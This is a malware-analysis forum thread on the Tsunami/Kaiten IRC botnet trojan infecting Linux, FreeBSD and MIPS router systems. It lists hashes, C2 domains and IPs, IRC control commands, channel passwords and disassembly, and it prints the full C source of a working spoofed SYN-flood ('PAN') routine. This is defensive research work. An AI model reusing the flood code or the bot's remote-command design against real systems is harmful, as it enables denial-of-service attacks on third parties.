[unixfreaxjp]

Found & handling a range of FreeBSD & Linux machines infected with this trojan.
Is a compiled ELF/x32 on a successful hacked machine.
Compilation traced to gcc, Linux is main target, xBSD or other *NIX system supported Linux compatibility also can be affected.
It was faking bash as "-bash" in process (ps) at xBSD which doesn't used that shell so it was spotted easily.

VT Summary: (LINK)

Code: Select all

SHA256: 6e4586e5ddf44da412e05543c275e466b9da0faa0cc20ee8a9cb2b2dfd48114e
SHA1: 13aa008b0f3c9e92450979ee52cb46accf49aff3
MD5: 6547b92156b39cb3bb5371b17d2488f2
File size: 18.5 KB ( 18902 bytes )
File name: -bash
File type: ELF
Tags: elf
Detection ratio: 7 / 47
Analysis date: 2013-05-30 11:37:36 UTC ( 4 minutes ago )
F-Secure                 : Generic.Malware.IFg.985D9435
GData                    : ELF:Tsunami-L
MicroWorld-eScan         : Generic.Malware.IFg.985D9435
Avast                    : ELF:Tsunami-L [Trj]
Kaspersky                : Backdoor.Linux.Tsunami.gen
BitDefender              : Generic.Malware.IFg.985D9435
Emsisoft                 : Generic.Malware.IFg.985D9435 (B)

Summary of this trojan:

Code: Select all

1. Usage the INET socket to make internet connection via IRC, HTTP or FTP
2. Locking itself in specific PID to avoid double starts/killed.
3. Forking support functionalities.
4. Remote control Bot-IRC functions like:
　a. Remote FTP access for infecting further
　b. Commands like:  NICK, SERVER, KILL, GET, HELP, ETC, SH; are the basic commmands used
　c. Custom commands like; _352, _376, _433 for botnet comm purpose.
  d. Flooding (DoS/DDoS) tools.

IMPORTANT! Flooding Operation is implemented in the program, w/ below HTTP header:

Code: Select all

       GET /%s HTTP/1.0\
        Connection: Keep-Alive
        User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
        Host: %s:80\
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
        Accept-Encoding: gzip\r\nAccept-Language: en
        Accept-Charset: iso-8859-1,*,utf-8
            (Following by long characters assembled/sent from botmaster via IRC)

The sample making IRC connection to the below host:

Code: Select all

cvv4you.ru    
188.190.124.120
188.190.124.81

And tried to download from below hosts by FTP:

Code: Select all

Hostname: wf.networksolution.com
Address:  205.178.189.131

Locking PID:

Code: Select all

// PID hooks:
waitpid
/tmp/tan.pid
Lockfile found. Exiting.
- bash // malware process..

IRC commands used (it used IDENT):

Code: Select all

PRIVMSG %s :Receiving file.
PRIVMSG %s :Saved as %s
PRIVMSG %s :NICK ＜nick＞
PRIVMSG %s :Nick cannot be larger than 9 characters.
NICK %s
PRIVMSG %s :Unable to resolve %s
PRIVMSG %s :MOVE ＜server＞
NOTICE %s :NICK ＜nick＞                    = Changes the nick of the client
NOTICE %s :SERVER ＜server＞                = Changes servers
NOTICE %s :KILL                           = Kills the client
NOTICE %s :GET ＜http address＞ ＜save as＞   = Downloads a file off the web and saves it onto the hd
NOTICE %s :HELP                           = Displays this
NOTICE %s :IRC ＜command＞                  = send_msgs this command to the server
NOTICE %s :SH ＜command＞                   = Executes a command
NICK
SERVER
KILL
HELP
IRC
PRIVMSG %s :%s
MODE %s -ix
NICK %s
JOIN %s :%s
WHO %s
PONG %s
PRIVMSG %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
PRIVMSG
PING

Logged on connectivity effort:

Code: Select all

// for IRC....
tcp4       0      0 x.x.x.x.59314     188.190.124.81.ircd    SYN_SENT
tcp4       0      0 x.x.x.x.60606     188.190.124.81.ircd    SYN_SENT
tcp4       0      0 x.x.x.x.46914     188.190.124.81.ircd    SYN_SENT
tcp4       0      0 x.x.x.x.53001     188.190.124.81.ircd    SYN_SENT
tcp4       0      0 x.x.x.x.50123     188.190.124.81.ircd    SYN_SENT
tcp4       0      0 x.x.x.x.36833     188.190.124.81.ircd    SYN_SENT
[...]
Active Internet connections
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
----------------------------------------------------------------------------
// for FTP....
tcp4       0      0 x.x.x.x.64873     wf.networksoluti.ftp   SYN_SENT
tcp4       0      0 x.x.x.x.64873     wf.networksoluti.ftp   SYN_SENT

More details analysis is in >> This Link
#MalwareMUSTDie!

[bsteo]

Sourcecode here: http://jarmoc.com/blog/2013/05/28/ror-c ... -the-wild/

[unixfreaxjp]

Thank's for the info. I checked the page & chat with the owner.
The fact is: we don't know for sure. do we?
Yes I saw some similarities, but that "could be" another variant. yes?
i.e. jarmoc.com's reported case was Linux, and no binary compiled report/hash on that. I need to see something to compare to be confirmed/sure.

[bsteo]

Is that one for sure and "that one" being a slight modification of better known "kaiten.c" aka Kaiten a Linux/Unix DDOS IRC bot.

[unixfreaxjp]

Is that one for sure and "that one" being a slight modification of better known "kaiten.c" aka Kaiten a Linux/Unix DDOS IRC bot.

I wish I knew this fact BEFORE I reversed them - sigh - what a waste of time..

[unixfreaxjp]

New & fresh sample, this time is in MIPS router (hacked) using stripped ELF:

Code: Select all

poke.sh: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), statically linked, with unknown capability 0xf41 = 0x756e6700, with unknown capability 0x70100 = 0x3040000, stripped

Typical identification:

Code: Select all

0x0143C8    NOTICE %s :Kaiten wa goraku
0x0146F0    NOTICE %s :TSUNAMI <target> <secs>

It's an additional (modded) version from the original one, using "PAN" attack command, in this db:

Code: Select all

 aNoticeSPanTarg:.ascii "NOTICE %s :PAN <target> <port> <secs>\n"<0>

Called from here:

Code: Select all

.text:0x402740 lw      $a0, 0x128+arg_0($fp)
.text:0x402744 lui     $v0, 0x41
.text:0x402748 addiu   $a1, $v0, (aNoticeSPanTarg - 0x410000); <====HERE!
.text:0x40274C lw      $a2, 0x128+arg_4($fp)
.text:0x402750 jal     sub_400558
.text:0x402754 nop

Details are in VT comment; https://www.virustotal.com/en/file/0173 ... 409864439/
CNC info are in "usual" format, using DDNS domain service to cover the takedown, decompiled code:

Code: Select all

char *servers「」 = {
"netcore.dyndn-web.com",
"horrayyy.dyndn-web.com",
"flippinflops.dyndns.tv",
"bilbywhay.dyndns.tv",
"doglikeatsocks.dyndns.tv",
"corenetz.dyndns-web.com",
(void*) 0  }; 

Alive NOW in :

Code: Select all

horrayyy.dyndn-web.com,79.143.177.241,
flippinflops.dyndns.tv,85.214.45.208

Germany IPs:

Code: Select all

79.143.177.241|ip-241-177-143-79.static.contabo.net.|51167 | 79.143.176.0/23 | CONTABO | DE | CONTABO.DE | CONTABO GMBH
85.214.45.208|eichwalde.de.|6724 | 85.214.0.0/15 | STRATO | DE | STRATO.DE | STRATO AG

Channel & Auth used:

Code: Select all

.text:0x40535C la      $v0, 0x4274BC
.text:0x405360 la      $v1, aCore       # "#core"
.text:0x405368 sw      $v1, 0($v0)
.text:0x40536C la      $v0, 0x4274B8
.text:0x405370 la      $v1, aBleh       # "bleh"
.text:0x405378 sw      $v1, 0($v0)

Modded by south asian crook/skids likely (language trace of the auth)
/* Please support our ELF malware OP #MalwareMustdie! Share us samples */

[unixfreaxjp]

So this is what the PAN attack is all about..

Code: Select all

void pan(int sock, char *sender, int argc, char **argv) {
        struct send_tcp send_tcp;
        struct pseudo_header pseudo_header;
        struct sockaddr_in sin;
        unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
        unsigned int psize=20, source, dest, check;
        unsigned long saddr, daddr,secs;
        int get;
        time_t start=time(NULL);
        if (mfork(sender) != 0) return;
        if (argc < 3) {
                Send(sock,"NOTICE %s :PAN <target> <port> <secs>\n",sender);
                exit(1);
        }
        if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
        {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
        daddr=host2ip(sender,argv[1]);
        secs=atol(argv[3]);
        Send(sock,"NOTICE %s :Panning %s.\n",sender,argv[1]);
        send_tcp.ip.ihl = 5;
        send_tcp.ip.version = 4;
        send_tcp.ip.tos = 16;
        send_tcp.ip.frag_off = 64;
        send_tcp.ip.ttl = 64;
        send_tcp.ip.protocol = 6;
        send_tcp.tcp.ack_seq = 0;
        send_tcp.tcp.doff = 10;
        send_tcp.tcp.res1 = 0;
        send_tcp.tcp.cwr = 0;
        send_tcp.tcp.ece = 0;
        send_tcp.tcp.urg = 0;
        send_tcp.tcp.ack = 0;
        send_tcp.tcp.psh = 0;
        send_tcp.tcp.rst = 0;
        send_tcp.tcp.fin = 0;
        send_tcp.tcp.syn = 1;
        send_tcp.tcp.window = 30845;
        send_tcp.tcp.urg_ptr = 0;
        dest=htons(atoi(argv[2]));
        while(1) {
                source=rand();
                if (atoi(argv[2]) == 0) dest=rand();
                saddr=getspoof();
                send_tcp.ip.tot_len = htons(40+psize);
                send_tcp.ip.id = rand();
                send_tcp.ip.saddr = saddr;
                send_tcp.ip.daddr = daddr;
                send_tcp.ip.check = 0;
                send_tcp.tcp.source = source;
                send_tcp.tcp.dest = dest;
                send_tcp.tcp.seq = rand();
                send_tcp.tcp.check = 0;
                sin.sin_family = AF_INET;
                sin.sin_port = dest;
                sin.sin_addr.s_addr = send_tcp.ip.daddr;
                send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
                check = rand();
                send_tcp.buf[9]=((char*)&check)[0];
                send_tcp.buf[10]=((char*)&check)[1];
                send_tcp.buf[11]=((char*)&check)[2];
                send_tcp.buf[12]=((char*)&check)[3];
                pseudo_header.source_address = send_tcp.ip.saddr;
                pseudo_header.dest_address = send_tcp.ip.daddr;
                pseudo_header.placeholder = 0;
                pseudo_header.protocol = IPPROTO_TCP;
                pseudo_header.tcp_length = htons(20+psize);
                bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
                bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
                send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
                sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
                if (a >= 50) {
                        if (time(NULL) >= start+secs) exit(0);
                        a=0;
                }
                a++;
        }
        close(get);
        exit(0);
}

[unixfreaxjp]

New samples on x32, x64, ARM and PPC!!
x32: https://www.virustotal.com/en/file/0e00 ... 410863138/
x64: https://www.virustotal.com/en/file/c2af ... 410863369/
ARM: https://www.virustotal.com/en/file/4730 ... 405408109/
PPC: https://www.virustotal.com/en/file/7094 ... 408727660/
Thank's to Malekal for the contribution.
It's the version with the PAN attack (v2), case is under investigation so I can not say much.

[unixfreaxjp]

New sample x32 https://www.virustotal.com/en/file/0e00 ... 411122356/
CNC:

Code: Select all

.rodata:0x04C2A0  db  65h ; e
.rodata:0x04C2A1  db  6Eh ; n
.rodata:0x04C2A2  db  64h ; d
.rodata:0x04C2A3  db  69h ; i
.rodata:0x04C2A4  db  6Eh ; n
.rodata:0x04C2A5  db  67h ; g
.rodata:0x04C2A6  db  2Eh ; .
.rodata:0x04C2A7  db  70h ; p
.rodata:0x04C2A8  db  75h ; u
.rodata:0x04C2A9  db  62h ; b
.rodata:0x04C2AA  db  6Ch ; l
.rodata:0x04C2AB  db  69h ; i
.rodata:0x04C2AC  db  63h ; c
.rodata:0x04C2AD  db  76h ; v
.rodata:0x04C2AE  db  6Dh ; m
.rodata:0x04C2AF  db  2Eh ; .
.rodata:0x04C2B0  db  63h ; c
.rodata:0x04C2B1  db  6Fh ; o
.rodata:0x04C2B2  db  6Dh ; m

Channel and channel auth:

Code: Select all

mov     ds:chan, offset aBorgir ; "#Borgir"
.mov     ds:key, offset aP06tain ; "p06tain"

[unixfreaxjp]

New one, used in shellshock attack https://www.virustotal.com/en/file/2c77 ... 411803777/